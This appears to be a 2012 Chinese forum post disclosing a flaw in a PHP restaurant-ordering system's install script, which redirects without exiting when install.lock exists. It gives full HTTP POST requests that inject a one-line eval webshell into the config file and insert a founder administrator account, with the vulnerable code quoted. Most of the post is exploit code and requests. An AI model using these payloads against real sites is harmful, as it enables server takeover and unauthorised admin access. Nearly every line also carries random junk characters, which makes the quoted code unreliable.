问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
* S. J- Z, G" Q4 m/ X2 `" r _( _. L! |0 B; E. b4 a
<?php+ o4 ~5 l) R! q/ Z/ ]; e
if(file_exists("../install.lock"))2 N7 j6 o2 O. Z6 ?$ K1 m
{
$ @9 k5 u( o, H. w# I6 A% u header("Location: ../");//没有退出
; Q2 s* U* F3 {4 r}
! a- u0 d5 C+ @! H
$ R0 l9 S( t# v5 s5 i- G2 J+ n//echo 'tst';exit;1 R/ i# H( O% n0 R% S) o
require_once("init.php");& c' i9 u+ c! [7 D1 [
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
$ M1 p8 O; a2 z' Z{8 x0 ^7 @4 { Z
可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
0 p3 ]' U7 ?+ z, N; D+ X6 Y
6 P; Y& E2 k0 e3 H- Z1、getshell(很危险)
) t& Z3 }5 q7 M' _' r- nif(empty($_REQUEST['step']) || $_REQUEST['step']==1)5 Q* ^" r5 }# K+ b3 Z7 s1 R, u
{
* X6 b1 y1 W6 ^4 y6 I$smarty->assign("step",1);
. ]1 v+ x1 j6 a. d% u8 z$smarty->display("index.html");
9 ^% k0 I7 f a* J5 v$ a# i}elseif($_REQUEST['step']==2)
7 A( ~0 n7 s4 d{( [- M* E! A% Z1 U% |, @ T$ @. A
$mysql_host=trim($_POST['mysql_host']);
( ~7 b7 {6 K8 H1 g% s( R# c $mysql_user=trim($_POST['mysql_user']);
7 ]! A/ F2 U0 g2 S $mysql_pwd=trim($_POST['mysql_pwd']);4 ~8 r- j& j# q1 n) K
$mysql_db=trim($_POST['mysql_db']);
$ D( |- U; ~& x o $tblpre=trim($_POST['tblpre']);4 K, f3 |/ k4 }- w* `$ V
$domain==trim($_POST['domain']);5 O! I+ Y0 T( T( M" n
$str="<?php \r\n";
+ x1 p* \* M" c2 i5 D: ?/ I $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";0 \6 g% G/ V- R7 y- Z k+ L: n6 B
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
8 i7 S" {& [, F. m $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
# O0 ]9 l1 b; k4 b $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
# y7 e2 i7 l- \7 S4 n $str.='define("MYSQL_CHARSET","GBK");'."\r\n";" W- _( e2 ^4 j2 i, v8 }
$str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
' V( h5 g* u2 d $str.='define("DOMAIN","'.$domain.'");'."\r\n";
a& M1 ?& z# o0 Q& I3 z) \9 J# B $str.='define("SKINS","default");'."\r\n";
; A& }) j- u: X+ O2 Z& F $str.='?>';, A+ o+ Z7 ~' {1 p1 J% N+ f
file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件 Z; p' b; S# o* K5 u* w
上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马
& |6 {8 k# \ m) @, Q$ \: LPOST /canting/install/index.php?m=index&step=2 HTTP/1.1
/ g1 n7 {3 \; M: M$ n7 iHost: 192.168.80.129
2 p- A+ }7 | f4 G& X2 j( B7 l8 ?User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0/ I! _: e+ P7 G9 w( R9 m- F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' @! h/ ?! W/ l L6 }* |
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
* I% S. W: H" S. p% J9 K' z1 w7 }8 QAccept-Encoding: gzip, deflate
3 M5 t5 ~0 \- p3 v TReferer: http://192.168.80.129/canting/install/index.php?step=1- ?7 G. x; K7 p
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42& K8 n- C: y$ _1 Y' X j
Content-Type: application/x-www-form-urlencoded
+ u0 W1 j, D# V4 U8 u% m7 n) `Content-Length: 1264 h# p: f; L) C( p5 e S
! _1 X/ Y" I( o3 D4 |mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD {( |+ C z" T) {
但是这个方法很危险,将导致网站无法运行。) ]! K; Y7 X* w( V
* r4 {8 u5 Y1 W; J) D
2、直接添加管理员8 b# h: N$ z* T% E
% f- c) X5 I' ] ]- R1 pelseif($_REQUEST['step']==5)0 p! q6 z) r9 O
{1 R& Y! r' o* \5 |& q+ m* V: G
if($_POST). d0 H+ W4 V0 m* j- Y9 L% o, G
{ require_once("../config/config.inc.php");- o2 `3 y2 E# ^0 n% Z. D2 O
$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
) x7 ^$ ~9 V2 N5 l, @6 I5 v mysql_select_db(MYSQL_DB,$link);$ f, i1 Z0 T6 G: n5 i0 ?. V, t8 Q
mysql_query("SET NAMES ".MYSQL_CHARSET );
3 E: }/ X2 f2 S7 M. f mysql_query("SET sql_mode=''");
1 o8 F) ~# S( q' Z+ X2 g1 h- m3 y+ k# x5 q) ~" m: r
$adminname=trim($_POST['adminname']);: w" Q7 V) I s. y7 W, @
$pwd1=trim($_POST['pwd1']);
+ P1 L& x0 ]% j* ~9 u! m $pwd2=trim($_POST['pwd2']);) M, D6 ~; d3 X6 i' Z
if(empty($adminname))
" M1 N# n- n; ^. W+ V {: u; `1 x3 {+ @5 T
; N, P( T$ l8 A6 u9 b echo "<script>alert('管理员不能为空');history.go(-1);</script>";
: P" Q0 K* u) B/ ^1 Y exit();2 W L8 |8 }7 m9 Q
}9 s" _: E8 T3 L1 [" r* n" F
if(($pwd1!=$pwd2) or empty($pwd1))
8 R+ R1 c) d2 s) [& ^8 R {
T0 e5 Q, a- {! H4 y echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出+ T- n8 u* }8 X! K0 z. y# U
}3 ?0 ]7 B, B/ ?+ Z e. B
mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员 t6 k) O: ?! a5 e8 v
}
- H! j, ~ W1 t% ^5 a这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:0 q h! Z: Y7 [, P2 ?
POST /canting/install/index.php?m=index&step=5 HTTP/1.1- V U2 c& X. G e1 I5 ?
Host: 192.168.80.129. b( {- Q! s8 X. {
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
4 Q `! c+ e/ `9 f/ X7 t8 hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8) o1 `' l) y# K# h6 i) n) n+ a* F
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
v5 x/ v9 d, H+ C$ l' W- L3 ^Accept-Encoding: gzip, deflate" N: t3 _: u/ ]1 o6 O* Q, B
Referer: http://www.2cto.com /canting/install/index.php?step=1. q1 e: H& B7 s
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
o; f M. b: uContent-Type: application/x-www-form-urlencoded
- [7 W! s) q! n6 r9 ?Content-Length: 46
+ y" @6 p/ R7 ~ 1 r$ J) H @' l; F0 L
adminname=qingshen&pwd1=qingshen&pwd2=qingshen
9 w5 S! H1 a) j9 }" L* k) K2 h |
发表于 2012-12-4 11:13:44
收藏
支持
反对